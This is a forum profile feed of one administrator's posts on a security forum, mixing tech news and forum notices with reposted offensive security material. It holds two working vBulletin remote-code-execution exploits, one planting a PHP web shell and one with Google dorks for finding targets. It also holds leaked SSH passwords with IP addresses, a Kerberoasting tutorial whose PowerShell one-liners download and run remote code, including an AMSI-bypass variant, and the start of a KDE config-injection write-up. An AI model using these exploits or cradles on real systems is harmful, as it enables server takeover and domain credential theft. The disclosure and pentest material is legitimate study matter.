
Nytro

Administrators
  • Content Count: 16632
  • Joined
  • Last visited
  • Days Won: 288

Everything posted by Nytro

  1. Samsung: Anyone's thumbprint can unlock Galaxy S10 phone

     Image caption: A graphic symbol tells users where they need to press to provide a fingerprint

     A flaw that means any fingerprint can unlock a Galaxy S10 phone has been acknowledged by Samsung. It promised a software patch that would fix the problem. The issue was spotted by a British woman whose husband was able to unlock her phone with his thumbprint just by adding a cheap screen protector. When the S10 was launched, in March, Samsung described the fingerprint authentication system as "revolutionary".

     Air gap

     The scanner sends ultrasounds to detect the 3D ridges of fingerprints in order to recognise users. Samsung said it was "aware of the case of S10's malfunctioning fingerprint recognition and will soon issue a software patch". South Korea's online-only KaKao Bank told customers to switch off the fingerprint-recognition option to log in to its services until the issue was fixed. Previous reports suggested some screen protectors were incompatible with Samsung's reader because they left a small air gap that interfered with the scanning.

     Thumb print

     The British couple who discovered the security issue told the Sun newspaper it was a "real concern". After buying a £2.70 gel screen protector on eBay, Lisa Neilson registered her right thumbprint and then found her left thumbprint, which was not registered, could also unlock the phone. She then asked her husband to try, and both his thumbs also unlocked it. And when the screen protector was added to another relative's phone, the same thing happened.

     Source: https://www.bbc.com/news/technology-50080586
  2. If you learn C++, it will be easy for you to pick up any other language later on.
  3. When it comes to discussions like these, the people eager to "discuss" show up as well.
  4. The menu button (next to Downloads) is tied to this application.
  5. Nytro

    ECSC

    Good question. I have no idea, but maybe they'll tell us if they are.
  6. Nytro

    ECSC

    For those who haven't heard yet, the Romanian team took first place. Congratulations!
  7. Nytro

    SSH Passwords

    I was looking for a dictionary of common SSH passwords and I found yours. Here is the list: https://github.com/jeanphorn/wordlist/blob/master/ssh_passwd.txt

    And here is a list with your passwords (right?):

    123parola321esniffu321$#@!nuirootutaudeateuita#@!@#$
    teiubescdartunumaiubestiasacahaidesaterminam
    cutiacusurprize
    119.161.216.250 SCANEAA VNC
    deathfromromaniansecurityteamneversleepba
    viataeocurva-si-asa-va-ramane-totdeauna
    vreau.sa.urc.255.de.emechi.pe.undernet
    MaiDuteMaiTareSiLentDacileaWaiCacatule
    SugiPulaMaCaNuEastaParolaMeaDeLaSSHD
    Fum4tulP0@t3Uc1d3R4uD3T0t!@#$%^%^&*?
    [www.cinenustieparolasugepula.biz]
    saracutaveronicaisacamcoptpasarica
    p00lanmata
    122.155.12.45 SCAN VNC
    suntcelmaitaresinimeninumadoboara
    doimaiomienouasuteoptzecisicinci
    ------Brz-O-Baga-n-Mata---------
    ana.este.o.dulceata.de.fata.2011
    Th3Bu1ES@VaDCuMm3RgeLak3T3LL1!!!
    bin;Fum4tulP0@t3Uc1d3R4uD3T0t!@
    amplecat10sastingbecuinbeci2003
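    On a practical note, a one-password-per-line wordlist like the one linked above is easy to check your own credentials against locally. A minimal sketch in Python (the `ssh_passwd.txt` path in the usage comment is an assumption; adapt it to wherever you saved the list):

    ```python
    def load_wordlist(path):
        """Read a one-password-per-line wordlist file into a set."""
        with open(path, encoding="utf-8", errors="ignore") as fh:
            return {line.strip() for line in fh if line.strip()}

    def compromised(candidates, wordlist):
        """Return which of your candidate passwords appear in the wordlist."""
        return sorted(set(candidates) & wordlist)

    # Usage (assuming the list was saved locally as ssh_passwd.txt):
    #   words = load_wordlist("ssh_passwd.txt")
    #   print(compromised(["yourpassword"], words))
    ```

    If any of your passwords show up, rotate them: dictionary-based SSH brute-forcing is exactly what these lists are used for.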
  8. Discuss anonymously with nearby people

     Clandesto is the place where you can discuss anything with people within your radius and get awarded karma points. Available on the App Store and Play Store.

     So what's Clandesto all about?

     Local community: Clandesto is your local community that shows you a live feed from people within your radius. Share news, events, funny experiences, and jokes more easily than ever!

     Join your community: Upvote the good and downvote the bad. By voting on posts, you have the power to decide what your community is talking about.

     Find your group: Find your local group, whether it's a neighbourhood, college campus, district, or village. You can also start your own private or public group.

     Website: https://clandesto.app/
     Twitter: https://twitter.com/clandestoapp
     Facebook: https://www.facebook.com/clandesto/
     Details: https://start-up.ro/cand-gdpr-ul-iti-da-o-idee-de-business-clandesto-socializare-anonima/
  9. Nytro

    ECSC

    ECSC takes place today and tomorrow in Bucharest (Palace of the Parliament). The live scoreboard can be seen here: https://ecsc.eu/
  10. <?php

      /*
          ---------------------------------------------------------------------
          vBulletin <= 5.5.4 (updateAvatar) Remote Code Execution Vulnerability
          ---------------------------------------------------------------------

          author..............: Egidio Romano aka EgiX
          mail................: n0b0d13s[at]gmail[dot]com
          software link.......: https://www.vbulletin.com/

          +-------------------------------------------------------------------------+
          | This proof of concept code was written for educational purpose only.    |
          | Use it at your own risk. Author will be not responsible for any damage. |
          +-------------------------------------------------------------------------+

          [-] Vulnerability Description:

          User input passed through the "data[extension]" and "data[filedata]"
          parameters to the "ajax/api/user/updateAvatar" endpoint is not properly
          validated before being used to update users' avatars. This can be
          exploited to inject and execute arbitrary PHP code. Successful
          exploitation of this vulnerability requires the "Save Avatars as Files"
          option to be enabled (disabled by default).

          [-] Disclosure timeline:

          [30/09/2019] - Vendor notified
          [03/10/2019] - Patch released: https://bit.ly/2OptAzI
          [04/10/2019] - CVE number assigned (CVE-2019-17132)
          [07/10/2019] - Public disclosure
      */

      set_time_limit(0);
      error_reporting(E_ERROR);

      if (!extension_loaded("curl")) die("[-] cURL extension required!\n");

      print "+-------------------------------------------------------------------------+";
      print "\n| vBulletin <= 5.5.4 (updateAvatar) Remote Code Execution Exploit by EgiX |";
      print "\n+-------------------------------------------------------------------------+\n";

      if ($argc != 4)
      {
          print "\nUsage......: php $argv[0] <URL> <Username> <Password>\n";
          print "\nExample....: php $argv[0] http://localhost/vb/ user passwd";
          print "\nExample....: php $argv[0] https://vbulletin.com/ evil hacker\n\n";
          die();
      }

      list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];

      $ch = curl_init();
      curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
      curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
      curl_setopt($ch, CURLOPT_HEADER, true);

      print "\n[-] Logging in with username '{$user}' and password '{$pass}'\n";

      curl_setopt($ch, CURLOPT_URL, $url);
      if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[-] Session ID not found!\n");

      curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=auth/login");
      curl_setopt($ch, CURLOPT_HTTPHEADER, $sid);
      curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$user}&password={$pass}");
      if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[-] Login failed!\n");

      print "[-] Logged-in! Retrieving security token...\n";

      curl_setopt($ch, CURLOPT_URL, $url);
      curl_setopt($ch, CURLOPT_POST, false);
      curl_setopt($ch, CURLOPT_HTTPHEADER, $sid);
      if (!preg_match('/token": "([^"]+)"/', curl_exec($ch), $token)) die("[-] Security token not found!\n");

      print "[-] Uploading new avatar...\n";

      $params = ["profilePhotoFile" => new CURLFile("avatar.jpeg"),
                 "securitytoken"    => $token[1]];

      curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=profile/upload-profilepicture");
      curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
      curl_setopt($ch, CURLOPT_HEADER, false);
      if (($path = (json_decode(curl_exec($ch)))->avatarpath) == null) die("[-] Upload failed!\n");
      if (preg_match('/image\.php\?/', $path)) die("[-] Sorry, the 'Save Avatars as Files' option is disabled!\n");

      print "[-] Updating avatar with PHP shell...\n";

      $php_code = '<?php print("____"); passthru(base64_decode($_SERVER["HTTP_CMD"])); ?>';

      $params = ["routestring"     => "ajax/api/user/updateAvatar",
                 "userid"          => 0,
                 "avatarid"        => 0,
                 "data[extension]" => "php",
                 "data[filedata]"  => $php_code,
                 "securitytoken"   => $token[1]];

      curl_setopt($ch, CURLOPT_URL, $url);
      curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
      if (curl_exec($ch) !== "true") die("[-] Update failed!\n");

      print "[-] Launching shell...\n";

      preg_match('/(\d+)\.jpeg/', $path, $m);
      $path = preg_replace('/(\d+)\.jpeg/', ($m[1]+1).".php", $path);

      curl_setopt($ch, CURLOPT_URL, "{$url}core/{$path}");
      curl_setopt($ch, CURLOPT_POST, false);

      while(1)
      {
          print "\nvb-shell# ";
          if (($cmd = trim(fgets(STDIN))) == "exit") break;
          curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]);
          preg_match('/____(.*)/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
      }

      Source: http://karmainsecurity.com/pocs/CVE-2019-17132
  11. Is anyone else interested? I'm waiting for PMs.
  12. IPBoard upgraded. Let me know if any problems come up.
  13. Yep, it's being discussed on their side too: https://forum.vbulletin.com/forum/vbulletin-5-connect/vbulletin-5-connect-questions-problems-troubleshooting/vbulletin-5-support-issues-questions/4422616-important-vb5-remote-exploit-in-the-wild PS: I hope the hackers don't attack us too with this exploit.
  14. Nytro

    XSSer

    Introduction:

    Cross Site "Scripter" (aka XSSer) is an automatic framework to detect, exploit and report XSS vulnerabilities in web-based applications. It provides several options to try to bypass certain filters, as well as various special techniques for code injection.

    XSSer comes with more than 1,300 pre-installed XSS attack vectors and can bypass/exploit code on several browsers/WAFs:

    - [PHPIDS]: PHP-IDS
    - [Imperva]: Imperva Incapsula WAF
    - [WebKnight]: WebKnight WAF
    - [F5]: F5 Big IP WAF
    - [Barracuda]: Barracuda WAF
    - [ModSec]: Mod-Security
    - [QuickDF]: QuickDefense
    - [Chrome]: Google Chrome
    - [IE]: Internet Explorer
    - [FF]: Mozilla's Gecko rendering engine, used by Firefox/Iceweasel
    - [NS-IE]: Netscape in IE rendering engine mode
    - [NS-G]: Netscape in Gecko rendering engine mode
    - [Opera]: Opera

    Current version:

    Download: Snapshot (.tar.gz): XSSer v1.8-1.tar.gz | Torrent (.tar.gz): XSSer v1.8-1.tar.gz.torrent

    wget https://xsser.03c8.net/xsser/xsser_1.8-1.tar.gz
    tar xf xsser_1.8-1.tar.gz
    cd xsser
    sudo python setup.py install
    ./xsser -h
    ./xsser --gtk (for the GUI)

    Snapshot (.zip): XSSer v1.8-1.zip | Torrent (.zip): XSSer v1.8-1.zip.torrent

    ALL: MD5/checksums

    Captures (screenshots): URL/Hash Generation Schema, Shell, Manifesto, Configuration, Bypassers, GeoMap

    Documentation:
    - 2012 at RootedCon | [ Slides: "XSSer - The Cross Site Scripting framework": Spanish ] - [ Video: Spanish ]
    - 2011 at THSF'11 | [ Slides: "XSSer - The Mosquito": English ]
    - 2009 at Cyberspace | [ Paper: "XSS for fun and profit": English | Spanish ]

    Installation:

    XSSer runs on many platforms. It requires Python and the following libraries:

    - python-pycurl - Python bindings to libcurl
    - python-xmlbuilder - create xml/(x)html files (Python 2.x)
    - python-beautifulsoup - error-tolerant HTML parser for Python
    - python-geoip - Python bindings for the GeoIP IP-to-country resolver library

    On Debian-based systems (e.g. Ubuntu), run:

    sudo apt-get install python-pycurl python-xmlbuilder python-beautifulsoup python-geoip

    Source Code:

    XSSer can be cloned from different code repositories. This is a good option if you want to update the tool automatically [ --update ] from time to time.

    +Official: https://code.03c8.net/epsylon/xsser
       ex: git clone https://code.03c8.net/epsylon/xsser
    +Mirror: https://github.com/epsylon/xsser
       ex: git clone https://github.com/epsylon/xsser

    Packages:

    XSSer v1.7.2b: "ZiKA-47 Swarm!":
    Download (.zip): XSSer v1.7-2.zip | Torrent (.tar.gz): XSSer v1.7-2.tar.gz.torrent | Torrent (.zip): XSSer v1.7-2.zip.torrent
    Ubuntu/Debian (64-bit) package: xsser_1.7-1_amd64.deb

    wget https://xsser.03c8.net/xsser/xsser_1.7-1_amd64.deb
    sudo dpkg -i xsser_1.7-1_amd64.deb
    xsser -h
    xsser --gtk (for the GUI)

    XSSer v1.6: "Grey Swarm!":
    Download (.tar.gz): XSSer v1.6-1.tar.gz
    RPM package: XSSer-1.6-1.noarch.rpm
    Ubuntu/Debian package: XSSer-1.6_all.deb

    XSSer v1.5: "Swarm Edition!":
    Ubuntu/Debian: xsser_1.5-1_all.deb.tar.gz

    XSSer v1.0: "The mosquito":
    Ubuntu/Debian: xsser_1.0-2_all.deb.tar.gz

    License:

    XSSer is released under the terms of the General Public License v3 and is copyrighted by psy.

    Support:

    This framework is actively looking for new sponsors and funding. If you or your organization has an interest in keeping XSSer alive, please get in touch directly.
    XSSer has been one of the winning projects of the NLnet Awards of April 2010. It has since been added to BackTrack Linux (2010), the OWASP project (2012), Cyborg Linux (2015), Kali Linux (2016) and BlackArch (2016). [ ... ]

    For donations: [ BTC:19aXfJtoYJUoXEZtjNwsah2JKN9CK5Pcjw ]

    Source: https://xsser.03c8.net/
  15. #!/usr/bin/python
      #
      # vBulletin 5.x 0day pre-auth RCE exploit
      #
      # This should work on all versions from 5.0.0 till 5.5.4
      #
      # Google Dorks:
      # - site:*.vbulletin.net
      # - "Powered by vBulletin Version 5.5.4"

      # Note: Python 2 script (raw_input, print statement).
      import requests
      import sys

      if len(sys.argv) != 2:
          sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])

      params = {"routestring": "ajax/render/widget_php"}

      while True:
          try:
              cmd = raw_input("vBulletin$ ")
              params["widgetConfig[code]"] = "echo shell_exec('" + cmd + "'); exit;"
              r = requests.post(url=sys.argv[1], data=params)
              if r.status_code == 200:
                  print r.text
              else:
                  sys.exit("Exploit failed! :(")
          except KeyboardInterrupt:
              sys.exit("\nClosing shell...")
          except Exception, e:
              sys.exit(str(e))

      Source: FullDisclosure
  16. It looks like we're getting some DDoS from Google Cloud IPs. I've temporarily blocked the 34.0.0.0/8, 35 and 104 ranges, and I'll add more if others show up. I'll remove them later.
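      For reference, checking whether a client address falls inside ranges like these is straightforward with Python's ipaddress module. A small sketch (reading the "35" and "104" shorthand above as /8 blocks is my assumption):

      ```python
      import ipaddress

      # Temporarily blocked ranges ("35" and "104" read as /8 blocks -- an assumption).
      BLOCKED = [ipaddress.ip_network(c) for c in ("34.0.0.0/8", "35.0.0.0/8", "104.0.0.0/8")]

      def is_blocked(ip):
          """True if the given address falls inside any blocked range."""
          addr = ipaddress.ip_address(ip)
          return any(addr in net for net in BLOCKED)
      ```

      Blocking whole /8s is a blunt instrument; this kind of check is handy for estimating how much legitimate traffic such a rule would also catch before applying it at the firewall.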
  17. Full Steam Ahead: Remotely Executing Code in Modern Desktop Application Architectures - Thomas Shadwell - INFILTRATE 2019
  18. How to: Kerberoast like a boss

     Neil Lines, 18 Sep 2019

     Kerberoasting: by default, all standard domain users can request a copy of all service accounts along with their correlating password hashes. Crack these and you could have administrative privileges. But that's so 2014. Why write a blog post about this in 2019, then? It still works well, and there are plenty of tips and tricks that can be useful for bypassing the restrictions you come up against. That's what this post is about. The process required to perform Kerberoasting is trivial thanks to the original research by Tim Medin, but what more can we learn?

     Everyone needs a lab

     Having a lab is key to testing. If you want to attempt any of the exploitation detailed in this blog, I would recommend building your own virtual Windows domain using whichever virtualisation solution you prefer. You can download free 90-day Windows host VMs from the following link:

     https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/

     180-day trial ISOs of Windows Server 2008R2, 2012R2, 2016 and 2019 can be downloaded from the following links:

     https://www.microsoft.com/en-gb/download/details.aspx?id=11093
     https://www.microsoft.com/en-gb/evalcenter/evaluate-windows-server-2012-r2

     Haven't created a virtual domain before? It's easy; this post explains all:

     https://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell/

     Kerberoasting

     In 2014 Tim Medin gave a talk called "Attacking Kerberos: Kicking the Guard Dog of Hades", in which he detailed the attack he called 'Kerberoasting'. This post won't revisit the hows and whys of Kerberoasting, but it will detail a number of different techniques showing you how to perform the exploitation, along with the results from testing each method in my lab. There's more on the theory behind Kerberoasting here:

     http://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/

     …you can also watch Tim's talk.
     https://www.youtube.com/watch?v=HHJWfG9b0-E

     Quick update

     Kerberoasting results in you collecting a list of service accounts along with their correlating password hashes from a local domain controller (DC). You do need to reverse any collected hashes, but it's well worth attempting the process because service accounts are commonly part of the domain admins (DA), enterprise admins (EA) or local administrators group.

     Blast in the past

     A few years back, while PowerShell (PS) was ruling the threat landscape, it was the go-to method for remote red team or internal infrastructure testing. Back then you could simply fire up a PS session, copy and paste a PS one-liner and be well on the way to collecting an account which belongs to the DA group. Let's go back in time for a minute and review using a PS one-liner to perform Kerberoasting. We start off by opening PowerShell, then running a dir command to view the contents of our user's home directory. Then copy and paste the following one-liner into PS and run it by pressing enter.

     powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt"

     What does this do? The one-liner instructs PS to relaunch, but this time with the ExecutionPolicy set to bypass, which enables untrusted scripts to run. The '(New-Object System.Net.WebClient).DownloadString' part downloads the Invoke-Kerberoast.ps1 script from the defined location and loads it into memory. The final section, Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt, runs the Kerberoast request and defines how the results should be returned: here they are set to match hashcat's file format requirements, followed by the output file name and type. In short: it downloads the script, runs it all in RAM and outputs the results ready for you to crack using hashcat.

     After running the one-liner you should see no response. To review the results, simply rerun the dir command to reveal the created file named 'kerb-Hash0.txt'. Manually open the directory, then double-click on the created file to open it in Notepad. If you're working remotely you can use the type command followed by the name of the .txt file you wish to view. The following screenshot details an extract from the collection of two service accounts from my lab. While it looks confusing to start with, the word following the * character is the username of the service account, so in the case of this demo the collected service account usernames are user1 and DA1.

     Personally, I'd review the domain groups for each collected service account; there is a time cost associated with the reversal process of attempting to crack the collected hashes, and if an account will not assist you in privilege escalation, I wouldn't waste the time trying to reverse it. Enumeration of user1 reveals it's a typical domain user:

     net user /domain user1

     Enumeration of the account titled DA1 reveals that it's part of the DA and EA groups, meaning it has unrestricted administrative access over all domain-joined machines and users:

     net user /domain da1

     The Reversal

     To reverse collected Kerberoasted hashes you can use hashcat; here's how to do that. The previous section ('Blast in the past') resulted in the collection of a service account with the username 'DA1'. To start the reversal process you need to copy the complete hash, starting with the first section '$krb5tgs' all the way to the end, and paste it into a file. You can add as many of the collected hashes as you like, just make sure each one is on its own line.
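     Since the account name sits right after the first '*' character in each $krb5tgs line (and before the following '$'), triaging which collected hashes belong to which accounts can be scripted rather than eyeballed. A minimal sketch; the hash line in the usage comment is made up:

     ```python
     def service_account(hash_line):
         """Extract the account name from a $krb5tgs hash line: it is the token
         immediately after the first '*' character."""
         star = hash_line.index("*")
         end = hash_line.index("$", star)
         return hash_line[star + 1:end]

     # Usage:
     #   service_account("$krb5tgs$23$*DA1$HACKLAB.LOCAL$svc*$aabb...")  # -> "DA1"
     ```

     Running this over the output file gives you the account list to enumerate with net user /domain before spending GPU time on cracking.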
     The screenshot below shows an extract of the collected 'DA1' hash. For this demo I'm using hashcat version 5.1.0; you can download a copy from the following location:

     https://hashcat.net/hashcat/

     I run hashcat locally on my laptop, which uses Windows 10 as a base OS. Although the graphics card is below average for a similar laptop, it can still chug through a Kerberoasted hash using a good-size dictionary in a short time. The hashcat command to reverse Kerberoasted hashes is as follows:

     hashcat64.exe -m 13100 hash.txt wordlist.txt outputfile.txt

     This is the command I ran to reverse the 'DA1' hash:

     hashcat64.exe -m 13100 "C:\Users\test\Documents\Kerb1.txt" C:\Users\test\Documents\Wordlists\Rocktastic12a --outfile="C:\Users\test\Documents\CrackedKerb1.txt"

     The above process took 44 seconds to recover the password. The screenshot shows the response from hashcat on completion; the 1/1 indicates that of the 1 hash provided, 1 was reversed. Finally, opening the file titled 'CrackedKerb1.txt' reveals the reversed password of 'Passw0rd!', which is always placed at the end of the hash. To verify the account had administrative rights across my lab domain, I tried the account in an RDP session to my local DC.

     It used to be fun

     Windows 10, with its fancy Defender and Antimalware Scan Interface (AMSI), has mostly ruined PS one-liners for us, so how can we get around this? Well, if your targets are using Defender (which is still quite rare in the enterprise wild) you're in luck, as there are some very well documented bypasses for AMSI. Mohammed Danish published a post titled "How to Bypass AMSI with an Unconventional PowerShell Cradle"; you can read it here:

     https://medium.com/@gamer.skullie/bypassing-amsi-with-an-unconventional-powershell-cradle-6bd15a17d8b9

     Quick version: the Net.WebClient function, which is commonly used in one-liners, has a signature in AMSI. By replacing it with the System.Net.WebRequest class, the one-liner runs because there is no signature for it. The following weaponises that AMSI bypass with the Kerberoast request:

     $webreq = [System.Net.WebRequest]::Create('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1'); $resp=$webreq.GetResponse(); $respstream=$resp.GetResponseStream(); $reader=[System.IO.StreamReader]::new($respstream); $content=$reader.ReadToEnd(); IEX($content); Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt

     It doesn't use AMSI

     This was a new one to me. While on a client site recently I tried the Kerberoast one-liner, but it was blocked by their AV. So I thought I would try the above AMSI bypass, which was also blocked. The problem was that their AV solution did not rely on Microsoft's AMSI to signature potential threats; it had its own solution for verifying potentially malicious PS scripts. My initial thought was: what do I do now? Well, this is where Rubeus (a C# toolset for raw Kerberos interaction and abuse) comes out to play. So, while they block most forms of PS, do they block C#? The answer is that not a lot do at present. You can read more about Rubeus here:

     https://github.com/GhostPack/Rubeus

     Rubeus comes uncompiled. Don't stress over this, though, as compiling C# projects is not as hard as it might seem. For this demonstration I used Microsoft's free Visual Studio, which I downloaded and installed into a Windows 10 VM:

     https://visualstudio.microsoft.com/vs/community/

     During the install process Visual Studio prompts you to select what you need; I ticked the following two. Following the installation of Visual Studio, git clone the Rubeus project from https://github.com/GhostPack/Rubeus and then, to start the process, double-click on the .sln file. (An SLN file is a structure file used for organising projects in Microsoft Visual Studio.) Finally, to compile Rubeus, click on the Start button.
     After running it once, a compiled .exe should have been created in the Debug directory, which can be found under the Rubeus-master\Rubeus\ directories. This is the full directory location of the compiled .exe I created for this post:

     C:\Users\IEUser\Desktop\Rubeus-master\Rubeus\bin\Debug

     Following the compiling of Rubeus, you can run it to perform a Kerberoast with the following command:

     Rubeus.exe kerberoast /format:hashcat > Hash1

     The .exe should run unprompted, but I did notice an error in my Windows 10 VM, which I downloaded from the developer.microsoft.com site: it prompted me to install the .NET Framework. You shouldn't need to do this on a target machine, as you would typically find .NET already installed in production environments. Running it in my Windows 7 VM worked first time and resulted in the collection of both service accounts. These are the details from an extract of the 'DA1' account as collected using Rubeus.

     While the command defines the output as a hashcat format, it requires a little tweaking before it can be used in hashcat. The following demonstrates what's required to prepare the hash for the reversal process. Open the output file, highlight all of the hash that you wish to reverse, and copy and paste it into Notepad++. Then highlight the first blank space right up to the first line, open Find and select the Replace tab. Leave 'Find what' defined as the space, add nothing to the 'Replace with' section, then click 'Replace All'. This should result in the hash becoming complete across one line, which is now ready for hashcat.

     No more Windows!

     What if you can't bypass the AV restrictions? How about using your own Kali Linux; any flavour will do. For this demo I'm using Impacket:

     https://github.com/SecureAuthCorp/impacket

     You can download it from GitHub by running the following:

     git clone https://github.com/SecureAuthCorp/impacket.git

     Before you can run the Kerberoast request you need to verify that you can ping the full internal Microsoft domain name from your Kali box. If you get no reply, you need to add a static DNS entry. To do this, use your editor of choice and add a single entry for the full domain referencing the IP address of their DC:

     gedit /etc/hosts

     127.0.0.1       localhost
     127.0.1.1       kali
     192.168.1.200   server1.hacklab.local

     Then try and ping the full domain name again. If you get a reply, it's looking good.

     ping server1.hacklab.local
     PING server1.hacklab.local (192.168.1.200) 56(84) bytes of data.
     64 bytes from server1.hacklab.local (192.168.1.200): icmp_seq=1 ttl=128 time=3.25 ms
     64 bytes from server1.hacklab.local (192.168.1.200): icmp_seq=2 ttl=128 time=0.519 ms

     To run the Kerberoast request from Impacket you need to move into the examples directory.

     root@kali:~# cd Desktop/
     root@kali:~/Desktop# cd impacket/
     root@kali:~/Desktop/impacket# cd examples/

     …and finally, the script you need to run is titled GetUserSPNs.py. The command is as follows:

     ./GetUserSPNs.py -request Add-Full-Domain-Name/Add-User-Name

     A nice addition is the -dc-ip Add-DC-IP-Address switch, which enables you to define which DC to point the request at. If all works as expected you'll be prompted for the user's password; after submitting that, you should see the service accounts with their hashes.

     Final Thoughts

     Kerberoasting collects service accounts along with their correlating password hashes. It is possible to reverse these hashes in a relatively short time if the password is based on a weakly defined word. Enterprises should review their own service accounts in Active Directory to verify whether they are actually necessary, and the service accounts that are required should be set with a complex, non-dictionary-based password.
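     As an aside, the Notepad++ cleanup described earlier (collapsing a console-wrapped Rubeus hash back onto the single line hashcat expects) can also be done in a few lines of Python; a minimal sketch:

     ```python
     def unwrap_hash(raw):
         """Join a hash that console wrapping split across several indented
         lines back into one line, stripping the leading/trailing whitespace
         each fragment picked up."""
         return "".join(part.strip() for part in raw.splitlines())
     ```

     Feed it the copied multi-line blob and write the result to your hash file, one hash per line.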
     Source: https://www.pentestpartners.com/security-blog/how-to-kerberoast-like-a-boss/
  19. The Year of Linux on the Desktop (CVE-2019-14744)

     [ kde, code execution ]

     0x01 Introduction

     There's been a lot of controversy regarding the KDE KConfig vulnerability, along with the way I decided to disclose the issue (full disclosure). Some have even decided to write blog posts analysing this vulnerability, despite the extremely detailed proof of concept I provided. That's why in this post I'm going to detail how I found the vulnerability, what led me to finding it, and what my thought process was throughout the research.

     Firstly, to summarise: KDE Frameworks (kf5/kdelibs) < 5.61.0 is vulnerable to a command injection vulnerability in the KConfig class. This can be directly exploited by having a remote user view a specially crafted configuration file; the only interaction required is viewing the file in a file browser and/or on the desktop. Sure, this requires a user downloading a file, but it's not hard to hide said file at all.

     Exploit demo uploaded by BleepingComputer

     0x02 Discovery

     After I had finished publishing the last couple of EA Origin vulnerabilities, I really wanted to get back on Linux and focus on vulnerabilities specific to Linux distributions. I figured that with Origin's client being written using the Qt framework, and the fact that KDE was also built using the Qt framework, I would maybe try looking into that. In turn, it led me to checking out KDE. Another factor that probably played a part in this whole process was that I had been using KDE on one of my laptops and was familiar enough with it that I could map out the attack surface fairly easily.

     The first lightbulb moment

     Most of the research I was doing at the time was shared with a good friend of mine who has helped me previously with other vulnerabilities. Thankfully this makes it easy for me to share the thought process with you folks. Because I was looking into KDE, I decided to first look at their default image viewer (gwenview). The idea behind this was: "if I can find a vulnerability in the default image viewer, that should be a fairly reliable exploit". Naturally, if we can host our payload in an image and trigger it when someone views it or opens it in their browser, it makes things really easy.

     The first lightbulb moment came when I realised that gwenview actually compiles a list of recently viewed files and uses the KConfig configuration syntax to set these entries. What stood out to me were the shell variables. Massive red flag. Depending on how these variables are being interpreted, we may be able to achieve command execution. Clearly, in File1 it's calling $HOME/Pictures/kdelol.gif and resolving the variable; otherwise, how would gwenview figure out where the file is? To see if these configuration entries were actually interpreting shell variables/commands, I added some of my own input in Name2.

     After looking in gwenview… nothing different? Okay, that kind of sucks, so I went back to the configuration file to see if anything had changed. It turns out gwenview interprets the shell variables when it gets launched, so in order for those recent files to be interpreted, gwenview must be freshly launched after the configuration file has been updated. Once that happens, the command will execute. As you can see, the command in the Name2 entry got interpreted and resolved the output of $(whoami). The reason it reverted back to Name1 is that I duplicated entries with File. This doesn't make much difference for us at the moment; as long as our commands are executing, that should be enough to move forward.

     Initially, I had no idea what the $e was supposed to mean, so I did the necessary digging and found the documentation for KDE System Configuration files. It turns out the $e is there to tell KDE to allow shell expansions. At this point, it wasn't a vulnerability or a glaring issue at all.
It definitely seemed dangerous though, and I was convinced more could be done to abuse it. After discovering KDE allows shell expansion in their config files, I sent a message to my buddy detailing what I had just learned. Here I present the idea that maybe a content injection type payload would be possible via the filename. Unfortunately I tried this, and KDE seems to properly parse new entries and escape them by adding an additional $. Either way, if you were to send someone a file with said payload, that would obviously be suspicious. Kind of defeats the purpose. At this point I wasn’t sure how to go about exploiting this issue. Surely there must be some way, this seems like a really bad idea. With that in mind, I got tired of trying the same thing over again and reading the same docs, so I took a break. The second lightbulb moment Eventually I came back to KDE and was browsing a directory where I needed to see hidden files (dotfiles). I went to Control > Show Hidden Files, and realized all of a sudden it created a .directory file in the current working directory. Okay, interesting. Being unsure of what this .directory file was, I looked at the contents. [Dolphin] Timestamp=2019,8,11,23,42,5 Version=4 [Settings] HiddenFilesShown=true The first thing I noticed was that it seemed to be consistent with the syntax that KDE uses for all of it’s configuration files. I instantly wondered if maybe those entries could be injected with a shell command, seeing as the .directory file was being read and processed by KConfig the moment the directory was opened. I tried injecting the version entry with my shell command, but it kept getting over-written. Didn’t seem like it was going to work. Now I was thinking “Hm, maybe KDE has some existing .directory files that could tell me something”. So I looked for them. 
zero@pwn$ locate *.directory
/usr/share/desktop-directories/kf5-development-translation.directory
/usr/share/desktop-directories/kf5-development-webdevelopment.directory
/usr/share/desktop-directories/kf5-development.directory
/usr/share/desktop-directories/kf5-editors.directory
/usr/share/desktop-directories/kf5-edu-languages.directory
/usr/share/desktop-directories/kf5-edu-mathematics.directory
/usr/share/desktop-directories/kf5-edu-miscellaneous.directory
[...]

As an example, let’s take kf5-development-translation.directory and look at the contents.

kf5-development-translation.directory:

[Desktop Entry]
Type=Directory
Name=Translation
Name[af]=Vertaling
[...]
Icon=applications-development-translation

I noticed that within the [Desktop Entry] tag, certain entries were being called that had keys. For example, the af key on the Name entry:

Name[af]=Vertaling

Seeing as KConfig is definitely checking entries for keys, let’s try adding a key with the $e option, like the config documentation mentioned.

Another thing that really interested me at this point was the Icon entry. It gives you the option to set the icon of either the current directory or the file itself. If the file is simply named .directory, it will set properties for the directory it’s in. If the file is named payload.directory, only the payload.directory file will have the Icon, not the parent directory. Why does it work like this? We’ll get into that in a second.

